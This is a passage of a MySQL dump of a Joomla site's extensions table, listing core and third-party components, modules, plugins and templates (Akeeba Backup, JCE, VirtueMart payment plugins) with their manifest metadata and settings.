\"minify\":0,\"global_object\":0,\"global_object_custom\":\"\",\"testing_localhost\":0}','','',0,'0000-00-00 00:00:00',0,0),(10055,10134,'plg_quickicon_akeebabackup','plugin','akeebabackup','quickicon',0,0,1,0,'{\"name\":\"plg_quickicon_akeebabackup\",\"type\":\"plugin\",\"creationDate\":\"2024-09-23\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2023 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeeba.com\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"8.4.0\",\"description\":\"PLG_QUICKICON_AKEEBABACKUP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akeebabackup\"}','{\"context\":\"mod_quickicon\",\"enablewarning\":\"1\",\"warnfailed\":\"1\",\"maxbackupperiod\":\"24\",\"profileid\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10057,10134,'PLG_SYSTEM_BACKUPONUPDATE','plugin','backuponupdate','system',0,0,1,0,'{\"name\":\"PLG_SYSTEM_BACKUPONUPDATE\",\"type\":\"plugin\",\"creationDate\":\"2024-09-23\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2023 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"8.4.0\",\"description\":\"PLG_SYSTEM_BACKUPONUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"backuponupdate\"}','{\"profileid\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10059,10154,'plg_system_jce','plugin','jce','system',0,1,1,0,'{\"name\":\"plg_system_jce\",\"type\":\"plugin\",\"creationDate\":\"27-04-2021\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2021 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.6\",\"description\":\"PLG_SYSTEM_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10060,10154,'plg_content_jce','plugin','jce','content',0,1,1,0,'{\"name\":\"plg_content_jce\",\"type\":\"plugin\",\"creationDate\":\"27-04-2021\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2021 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.6\",\"description\":\"PLG_CONTENT_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10061,0,'VM Payment - Pay with Amazon','plugin','amazon','vmpayment',0,0,1,0,'{\"name\":\"AMAZON\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"AMAZON PAY plugin\",\"group\":\"\",\"filename\":\"amazon\"}','','','',0,'0000-00-00 00:00:00',10,0),(10062,0,'System - Pay with Amazon','plugin','amazon','system',0,0,1,0,'{\"name\":\"AMAZON\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"AMAZON payment SYSTEM plugin\",\"group\":\"\",\"filename\":\"amazon\"}','','','',0,'0000-00-00 00:00:00',10,0),(10063,0,'VM Payment - KlikAndPay','plugin','klikandpay','vmpayment',0,0,1,0,'{\"name\":\"VM Payment - klikandpay\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2018 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"<a href=\\\"http:\\/\\/klikandpay.com\\\" target=\\\"_blank\\\">klikandpay<\\/a> \\n    \",\"group\":\"\",\"filename\":\"klikandpay\"}','','','',0,'0000-00-00 00:00:00',8,0),(10134,0,'Akeeba Backup package','package','pkg_akeeba','',0,1,1,0,'{\"name\":\"Akeeba Backup package\",\"type\":\"package\",\"creationDate\":\"2024-09-23\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"8.4.0\",\"description\":\"Akeeba Backup installation package v.8.4.0\",\"group\":\"\",\"filename\":\"pkg_akeeba\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10133,10134,'PLG_ACTIONLOG_AKEEBABACKUP','plugin','akeebabackup','actionlog',0,0,1,0,'{\"name\":\"PLG_ACTIONLOG_AKEEBABACKUP\",\"type\":\"plugin\",\"creationDate\":\"2024-09-23\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2023 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"8.4.0\",\"description\":\"PLG_ACTIONLOG_AKEEBABACKUP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akeebabackup\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10147,0,'VM Payment - eWay','plugin','eway','vmpayment',0,0,1,0,'{\"name\":\"VM Payment - eway\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2018 - 2019 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"<a href=\\\"https:\\/\\/www.eway.com.au\\/\\\" target=\\\"_blank\\\">eway<\\/a> \\n    \",\"group\":\"\",\"filename\":\"eway\"}','','','',0,'0000-00-00 00:00:00',20,0),(10066,0,'beez3','template','beez3','',0,1,1,0,'{\"name\":\"beez3\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"3.1.0\",\"description\":\"TPL_BEEZ3_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\",\"backgroundcolor\":\"#eee\"}','','',0,'0000-00-00 00:00:00',0,0),(10067,0,'protostar','template','protostar','',0,1,1,0,'{\"name\":\"protostar\",\"type\":\"template\",\"creationDate\":\"4\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"(C) 2012 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_PROTOSTAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"templateColor\":\"#08C\",\"templateBackgroundColor\":\"#F4F6F7\",\"logoFile\":\"\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10068,0,'isis','template','isis','',1,1,1,0,'{\"name\":\"isis\",\"type\":\"template\",\"creationDate\":\"3\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"(C) 2012 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_ISIS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"templateColor\":\"#10223E\",\"headerColor\":\"#1A3867\",\"sidebarColor\":\"#3071a9\",\"linkColor\":\"#3071a9\",\"loginBackgroundColor\":\"#17568C\",\"logoFile\":\"\",\"loginLogoFile\":\"\",\"admin_menus\":\"1\",\"displayHeader\":\"1\",\"statusFixed\":\"1\",\"stickyToolbar\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10069,0,'com_ajax','component','com_ajax','',1,1,1,0,'{\"name\":\"com_ajax\",\"type\":\"component\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_AJAX_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ajax\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10070,0,'com_associations','component','com_associations','',1,1,1,0,'{\"name\":\"com_associations\",\"type\":\"component\",\"creationDate\":\"January 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"COM_ASSOCIATIONS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10071,0,'com_contenthistory','component','com_contenthistory','',1,1,1,0,'{\"name\":\"com_contenthistory\",\"type\":\"component\",\"creationDate\":\"May 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_CONTENTHISTORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contenthistory\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10072,0,'com_fields','component','com_fields','',1,1,1,0,'{\"name\":\"com_fields\",\"type\":\"component\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"COM_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10073,0,'com_postinstall','component','com_postinstall','',1,1,1,0,'{\"name\":\"com_postinstall\",\"type\":\"component\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_POSTINSTALL_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10074,0,'com_tags','component','com_tags','',1,1,1,0,'{\"name\":\"com_tags\",\"type\":\"component\",\"creationDate\":\"December 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"COM_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10075,0,'mod_tags_popular','module','mod_tags_popular','',0,1,1,0,'{\"name\":\"mod_tags_popular\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_popular\"}','{\"maximum\":\"5\",\"timeframe\":\"alltime\",\"order_value\":\"count\",\"order_direction\":\"1\",\"display_count\":\"0\",\"no_results_text\":\"0\",\"minsize\":\"1\",\"maxsize\":\"2\",\"layout\":\"_:default\",\"owncache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10076,0,'mod_tags_similar','module','mod_tags_similar','',0,1,1,0,'{\"name\":\"mod_tags_similar\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_SIMILAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_similar\"}','{\"maximum\":\"5\",\"matchtype\":\"any\",\"ordering\":\"count\",\"owncache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10077,0,'mod_stats_admin','module','mod_stats_admin','',1,1,1,0,'{\"name\":\"mod_stats_admin\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats_admin\"}','{\"serverinfo\":\"0\",\"siteinfo\":\"0\",\"counter\":\"0\",\"increase\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(10078,0,'plg_authentication_cookie','plugin','cookie','authentication',0,0,1,0,'{\"name\":\"plg_authentication_cookie\",\"type\":\"plugin\",\"creationDate\":\"July 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_COOKIE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"cookie\"}','{\"cookie_lifetime\":\"60\",\"key_length\":\"16\"}','','',0,'0000-00-00 00:00:00',0,0),(10079,0,'plg_content_contact','plugin','contact','content',0,1,1,0,'{\"name\":\"plg_content_contact\",\"type\":\"plugin\",\"creationDate\":\"January 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2014 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.2\",\"description\":\"PLG_CONTENT_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10080,0,'plg_content_fields','plugin','fields','content',0,0,1,0,'{\"name\":\"plg_content_fields\",\"type\":\"plugin\",\"creationDate\":\"February 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_CONTENT_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10081,0,'plg_editors-xtd_contact','plugin','contact','editors-xtd',0,0,1,0,'{\"name\":\"plg_editors-xtd_contact\",\"type\":\"plugin\",\"creationDate\":\"October 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10082,0,'plg_editors-xtd_fields','plugin','fields','editors-xtd',0,0,1,0,'{\"name\":\"plg_editors-xtd_fields\",\"type\":\"plugin\",\"creationDate\":\"February 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10083,0,'plg_editors-xtd_menu','plugin','menu','editors-xtd',0,0,1,0,'{\"name\":\"plg_editors-xtd_menu\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_EDITORS-XTD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"menu\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10084,0,'plg_editors-xtd_module','plugin','module','editors-xtd',0,0,1,0,'{\"name\":\"plg_editors-xtd_module\",\"type\":\"plugin\",\"creationDate\":\"October 2015\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2015 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"PLG_MODULE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"module\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10085,10154,'plg_extension_jce','plugin','jce','extension',0,1,1,0,'{\"name\":\"plg_extension_jce\",\"type\":\"plugin\",\"creationDate\":\"27-04-2021\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2021 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.6\",\"description\":\"PLG_EXTENSION_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10086,0,'plg_fields_calendar','plugin','calendar','fields',0,0,1,0,'{\"name\":\"plg_fields_calendar\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_CALENDAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"calendar\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10087,0,'plg_fields_checkboxes','plugin','checkboxes','fields',0,0,1,0,'{\"name\":\"plg_fields_checkboxes\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_CHECKBOXES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"checkboxes\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10088,0,'plg_fields_color','plugin','color','fields',0,0,1,0,'{\"name\":\"plg_fields_color\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_COLOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"color\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10089,0,'plg_fields_editor','plugin','editor','fields',0,0,1,0,'{\"name\":\"plg_fields_editor\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_EDITOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"editor\"}','{\"buttons\":\"0\",\"width\":\"100%\",\"height\":\"250px\",\"filter\":\"JComponentHelper::filterText\"}','','',0,'0000-00-00 00:00:00',0,0),(10090,0,'plg_fields_imagelist','plugin','imagelist','fields',0,0,1,0,'{\"name\":\"plg_fields_imagelist\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_IMAGELIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"imagelist\"}','{\"directory\":\"\\/\",\"multiple\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10091,0,'plg_fields_integer','plugin','integer','fields',0,0,1,0,'{\"name\":\"plg_fields_integer\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_INTEGER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"integer\"}','{\"multiple\":\"0\",\"first\":\"1\",\"last\":\"100\",\"step\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10092,0,'plg_fields_list','plugin','list','fields',0,0,1,0,'{\"name\":\"plg_fields_list\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_LIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"list\"}','{\"multiple\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10093,0,'plg_fields_media','plugin','media','fields',0,0,1,0,'{\"name\":\"plg_fields_media\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_MEDIA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"media\"}','{\"preview\":\"tooltip\"}','','',0,'0000-00-00 00:00:00',0,0),(10094,0,'plg_fields_radio','plugin','radio','fields',0,0,1,0,'{\"name\":\"plg_fields_radio\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_RADIO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"radio\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10095,0,'plg_fields_sql','plugin','sql','fields',0,0,1,0,'{\"name\":\"plg_fields_sql\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_SQL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sql\"}','{\"multiple\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10096,0,'plg_fields_text','plugin','text','fields',0,0,1,0,'{\"name\":\"plg_fields_text\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_TEXT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"text\"}','{\"filter\":\"JComponentHelper::filterText\"}','','',0,'0000-00-00 00:00:00',0,0),(10097,0,'plg_fields_textarea','plugin','textarea','fields',0,0,1,0,'{\"name\":\"plg_fields_textarea\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_TEXTAREA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"textarea\"}','{\"rows\":\"10\",\"cols\":\"10\",\"filter\":\"JComponentHelper::filterText\"}','','',0,'0000-00-00 00:00:00',0,0),(10098,0,'plg_fields_url','plugin','url','fields',0,0,1,0,'{\"name\":\"plg_fields_url\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_URL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"url\"}','{\"relative\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10099,0,'plg_fields_user','plugin','user','fields',0,0,1,0,'{\"name\":\"plg_fields_user\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_USER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"user\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10100,0,'plg_fields_usergrouplist','plugin','usergrouplist','fields',0,0,1,0,'{\"name\":\"plg_fields_usergrouplist\",\"type\":\"plugin\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"PLG_FIELDS_USERGROUPLIST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"usergrouplist\"}','{\"multiple\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10101,0,'plg_finder_tags','plugin','tags','finder',0,0,1,0,'{\"name\":\"plg_finder_tags\",\"type\":\"plugin\",\"creationDate\":\"February 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10102,0,'PLG_INSTALLER_FOLDERINSTALLER','plugin','folderinstaller','installer',0,1,1,0,'{\"name\":\"PLG_INSTALLER_FOLDERINSTALLER\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_FOLDERINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"folderinstaller\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10103,10154,'plg_installer_jce','plugin','jce','installer',0,1,1,0,'{\"name\":\"plg_installer_jce\",\"type\":\"plugin\",\"creationDate\":\"27-04-2021\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2021 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.9.6\",\"description\":\"PLG_INSTALLER_JCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10104,0,'plg_installer_packageinstaller','plugin','packageinstaller','installer',0,1,1,0,'{\"name\":\"plg_installer_packageinstaller\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_PACKAGEINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"packageinstaller\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10105,0,'PLG_INSTALLER_URLINSTALLER','plugin','urlinstaller','installer',0,1,1,0,'{\"name\":\"PLG_INSTALLER_URLINSTALLER\",\"type\":\"plugin\",\"creationDate\":\"May 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2016 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.0\",\"description\":\"PLG_INSTALLER_URLINSTALLER_PLUGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"urlinstaller\"}','{}','','',0,'0000-00-00 